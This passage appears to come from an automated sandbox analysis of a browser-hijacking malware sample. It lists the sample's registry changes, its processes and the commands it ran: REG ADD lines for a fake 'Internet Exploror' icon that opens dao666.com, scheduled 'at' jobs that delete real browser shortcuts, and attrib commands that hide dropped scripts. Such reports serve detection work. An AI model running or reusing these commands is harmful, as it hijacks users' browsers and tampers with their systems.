| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\tool.cmd
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2804 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\runonce.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\copy.cmd
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\360.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\cpa.cmd
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
".\msn.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
